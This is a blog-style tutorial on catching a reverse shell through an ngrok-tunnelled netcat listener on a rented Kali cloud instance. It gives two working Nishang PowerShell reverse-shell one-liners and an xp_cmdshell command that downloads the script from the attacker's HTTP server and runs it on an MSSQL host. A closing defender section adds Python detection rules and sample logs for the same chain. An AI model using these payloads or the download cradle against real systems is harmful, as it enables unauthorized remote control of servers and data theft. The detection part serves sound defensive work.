Fishing for a reverse shell

Recently I had a scenario where I had to catch a reverse shell in a public facing environment. This meant that a public facing instance was needed where the listener could be set up to catch this shell.

The approach was similar to setting it up on a local environment, apart from a few things that we needed to do to expose a public instance so it could be used as a listener to catch this shell.

0 - Choosing a provider

I found Vultr to be the cheapest and easiest option for me (this is not sponsored), although you can choose any other provider you prefer.

For Vultr, I was able to select the cheapest instance and use the Kali ISO as a custom install. I deleted the instance once I was done with it, as they charge you for powered-down images as well because they still take up resources.

Source —> https://www.vultr.com/

1 - Setting up Ngrok

“ngrok is a secure unified ingress platform that combines your reverse proxy, firewall, API gateway and global load balancing into a production service.”

It is quite simple to get started with this service. Just go to https://dashboard.ngrok.com/signup and establish an account. Once that is done we can proceed to installing this via a snap package:

snap install ngrok

The above might give an error in some instances if the service is not enabled. So to rectify this, we run the following commands and enable the service:

$ systemctl enable snapd.service
$ systemctl start snapd.service

After the snap service has successfully started/restarted, we can proceed to installing ngrok via a snap package install as follows:

$ sudo snap install ngrok

Once ngrok is installed, we can navigate to the setup page and grab our auth token from the ngrok web UI; for Linux (in our case) we can navigate here -> https://dashboard.ngrok.com/get-started/setup/linux and copy the ngrok config command that already includes our auth token.

Before running the ngrok config command, we need to ensure that the PATH variable in our terminal is set up so we can call ngrok directly; the export PATH command sets the PATH environment variable for the current session only. We do this as follows:

$ export PATH=$PATH:/snap/bin

After the PATH is set up, we run the ngrok config command with our token to get ngrok up and running:

ngrok config add-authtoken <TOKEN>

After the configuration has been added with the auth token, we are all set to run ngrok on a port of our choice. I chose TCP 1234 in my case (but this could be any port, depending on the scenario you are in):

$ ngrok tcp 1234

This pops up an ngrok dashboard, where the address of our listener is provided as an ngrok hostname and port. This will be used as the listening host (LHOST) throughout, as it is now the address exposed to catch our shell over the internet.

2 - Setting up Netcat Listener

As our reverse shell listener, we can use netcat to listen on port 1234, the port we set as our LPORT, as follows:

$ nc -lvnp 1234

3 - Exploiting an MSSQL Service

I already had partial access to an MSSQL service, but needed interactive shell access. So I decided to use Nishang’s Invoke-PowerShellTcpOneLine.ps1 to create my reverse shell. After deleting comments and unwanted bloat, I was able to use the following and save it as script1.ps1 for hosting on my cloud instance:

$client = New-Object System.Net.Sockets.TCPClient('NGROK ADDRESS',NGROK PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$sm=(New-Object Net.Sockets.TCPClient('NGROK ADDRESS',NGROK PORT)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

In the above, replace 'NGROK ADDRESS' and NGROK PORT with your ngrok address and port. These are the address and port of the ngrok proxy, as shown on the dashboard when you launched the ngrok tcp command (NOT the LPORT 1234 we chose for netcat).

Now we can host the above as script.ps1 (or another name of your choice) on our publicly exposed cloud instance. To do this we can use Python's simple HTTP server on the Kali instance, run from the directory where you placed script.ps1:

$ python -m http.server 9090

Since I already had some access to the MSSQL service via xp_cmdshell, I was able to run a PowerShell command through it to execute our Nishang reverse shell, downloading it from our hosted instance and launching it as follows:

powershell echo IEX (New-Object Net.WebClient).DownloadString("http://CLOUD-INSTANCE-IP:9090/script.ps1") | powershell -noprofile
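From the defender's side, the chain above leaves three distinct traces on the database host: the SQL Server service process spawning PowerShell, a DownloadString cradle handed to IEX, and a TCPClient loop that IEXes whatever it reads. The following Python is an added example (not part of the original post) that scans constructed process-creation log lines for those indicators; the log format, rule names and IP addresses are assumptions made for the example.

```python
import re

# Each rule requires all of its indicators to be present in one log line.
# Rule names and the key=value log format are assumptions for this example.
RULES = [
    ("sqlservr_spawns_powershell",
     re.compile(r"(?=.*parent=sqlservr\.exe)(?=.*\bpowershell\b)", re.I)),
    ("download_cradle",
     re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)(?=.*downloadstring)", re.I)),
    ("tcp_shell_loop",
     re.compile(r"(?=.*net\.sockets\.tcpclient)(?=.*\b(?:iex|invoke-expression)\b)", re.I)),
]


def match_rules(line):
    """Return the names of every rule whose indicators all appear in the line."""
    return [name for name, pattern in RULES if pattern.search(line)]


def find_alerts(lines):
    """Return (line_number, [rule names]) for each log line that trips a rule."""
    alerts = []
    for number, line in enumerate(lines, start=1):
        hits = match_rules(line)
        if hits:
            alerts.append((number, hits))
    return alerts


# Constructed sample process-creation log lines (not from the original post):
# the xp_cmdshell launch of the download cradle, the one-liner it fetched,
# and two benign process launches that must not alert.
SAMPLE_LOGS = [
    "ts=2024-01-01T10:00:01Z host=sql01 parent=sqlservr.exe image=cmd.exe "
    "cmd='cmd.exe /c powershell echo IEX (New-Object Net.WebClient)"
    ".DownloadString(\"http://203.0.113.5:9090/script.ps1\") | powershell -noprofile'",
    "ts=2024-01-01T10:00:02Z host=sql01 parent=cmd.exe image=powershell.exe "
    "cmd='powershell -noprofile $c = New-Object Net.Sockets.TCPClient(\"203.0.113.5\",1234);"
    " ... $sendback = (iex $data 2>&1 | Out-String)'",
    "ts=2024-01-01T10:05:00Z host=sql01 parent=services.exe image=sqlservr.exe "
    "cmd='sqlservr.exe -sMSSQLSERVER'",
    "ts=2024-01-01T10:06:00Z host=web01 parent=explorer.exe image=powershell.exe "
    "cmd='powershell Get-ChildItem C:\\logs'",
]

if __name__ == "__main__":
    for number, hits in find_alerts(SAMPLE_LOGS):
        print(f"line {number}: {', '.join(hits)}")
```

Disabling xp_cmdshell where it is not required removes the first link of the chain; the remaining two rules still catch the cradle and the shell loop if they arrive by another route.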

Fin.
